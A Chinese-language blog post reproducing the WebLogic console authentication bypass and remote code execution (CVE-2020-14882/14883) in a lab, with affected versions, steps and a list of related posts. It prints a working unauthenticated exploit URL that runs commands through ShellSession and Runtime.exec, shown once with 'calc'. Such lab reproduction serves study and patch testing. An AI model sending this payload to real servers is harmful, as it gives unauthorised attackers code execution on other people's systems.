2. 程式人生 > 實用技巧 >CVE-2020-14882​&14883:Weblogic RCE復現

CVE-2020-14882​&14883:Weblogic RCE復現

阿新 發佈:2020-12-15

0x01 簡介

Weblogic是美國Oracle公司出品的一個Application Server,確切的說是一個基於JavaEE架構的中介軟體,Weblogic是用於開發、整合、部署和管理大型分散式Web應用、網路應用和資料庫應用的Java應用伺服器。

0x02 漏洞描述

未經身份驗證的遠端攻擊者可能通過構造特殊的GET請求,利用該漏洞在受影響的 Weblogic Server上執行任意程式碼。

影響版本

  • weblogic 10.3.6.0.0
  • weblogic 12.1.3.0.0
  • weblogic 12.2.1.3.0
  • weblogic 12.2.1.4.0
  • weblogic 14.1.1.0.0

0x03 環境搭建

請參考https://www.cnblogs.com/KHZ521/p/14053395.html

0x04 漏洞復現

POC:

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27執行的命令%27);%22);

1.檢視伺服器weblogic的版本 (這裡用的是CVE-2020-14645weblogic漏洞探測工具)

2.隨便請求並抓包

3.使用poc進行測試

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc%27);%22);


4.復現成功

0x05 結束語

這個地方有點小問題,測試poc的時候相應包的響應結果很慢,並且伺服器端打開了十幾個視窗,我也不知道是為啥,反正復現成功了

相關推薦

CVE-2020-14882​&14883Weblogic RCE復現

0x01 簡介 Weblogic是美國Oracle公司出品的一個Application Server,確切的說是一個基於JavaEE架構的中介軟體,Weblogic是用於開發、整合、部署和管理大型分散式Web應用、網路應用和資料庫應用的Java應用伺服器。

Weblogic未授權遠端命令執行漏洞(CVE-2020-14882&CVE-2020-14883復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

weblogic 未授權命令執行漏洞(CVE-2020-14882,CVE-2020-14883復現

漏洞描述 2020年10月29日,360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883 ,漏洞等級嚴重,漏洞評分9.8。遠端攻擊者可以構造特殊的HTTP請求,在未經身

CVE-2020-14882 weblogic 未授權命令執行復現

簡介 未經身份驗證的遠端攻擊者可能通過構造特殊的 HTTP GET請求,利用該漏洞在受影響的 WebLogic Server 上執行任意程式碼。

2020 weblogin rce CVE-2020-14882 漏洞利用POC

漏洞來源 根據P牛圈子告知,應該是長亭某研究員上報“voidfyoo”。 細節由國外人員披露

Bypassing login in WebLogic – Analysis of CVE-2020-14882 Vulnerability

Abstract The console of WebLogic required login with username and password. However, by exploiting the vulnerability, an attacker is can bypass authorization to access its console.

CVE-2020-14882 weblogic 未授權訪問漏洞

(1)許可權繞過漏洞(CVE-2020-14882),因為CVE-2020-14882未授權訪問漏洞是繞過管理控制檯許可權訪問後臺,所以需要存在console控制檯,訪問ip:port/console

cve-2020-1472,netlogon特權提升漏洞復現

cve-2020-1472,netlogon特權提升漏洞, 漏洞原理攻擊者通過NetLogon(MS-NRPC),建立與域控間易受攻擊的安全通道時,可利用此漏洞獲取域管訪問許可權。成功利用此漏洞的攻擊者可以在該網路中的裝置上執行經特殊設

CVE-2022-22947 Spring Cloud Gateway SPEL RCE復現

CVE-2022-22947 Spring Cloud Gateway SPEL RCE漏洞復現 目錄0 環境搭建1 漏洞觸發點2 構建poc3 總結參考

CVE-2020-5902 f5-big-ip Read File&RCE利用方式

介紹 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-14825Weblogic反序列化漏洞復現

全程無圖,全靠編 參考:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247486336&idx=1&sn=2a054ededbc855622fe2ac6c8906aae0&chksm=90392d70a74ea46635bef3cd4fc414cef87d16a1875ccb690f

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行RCE

cve-2020-5902 : RCE:curl -v -k \'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\'

F5 BIG-IP 遠端程式碼執行RCE(CVE-2020-5902)復現

漏洞簡介 F5 BIG-IP 是美國``F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

oracle 7月份更新 CVE-2020-14625 復現&利用

diff補丁 首先下載7月份補丁,與四月份對比,發現有以下不同之處 com.oracle.wls.shaded.org.apache.xalan.xsltc.trax

oracle 7月份更新CVE-2020-14645 復現&利用

簡介 該漏洞針對gadget cve-2020-2555 繞過利用。 分析 com.tangosol.util.extractor.UniversalExtractor程式碼如下

CVE-2020-5902 F5 BIG-IP RCE復現

目錄簡介影響版本搜尋語法原理解析手動復現利用工具參考 簡介 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

CVE-2020-14644 weblogic iiop反序列化漏洞

0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 0x01 環境準備

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現 漏洞介紹 今日,Oracle官方釋出WebLogic安全更新,其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645),該漏洞通過T3協議進行利用,攻擊者可以實現遠端程式碼執行

CVE-2020-2555漏洞復現&&流量分析

CVE-2020-2555漏洞復現&&流量分析 一、準備環境 windows7:weblogic 12.2.1.4.0 JDK版本為jdk-8u261

CVE-2020-2883漏洞復現&&流量分析

CVE-2020-2883漏洞復現&&流量分析 寫在前面 網上大佬說CVE-2020-2883是CVE-2020-2555的繞過,下面就復現了抓包看看吧。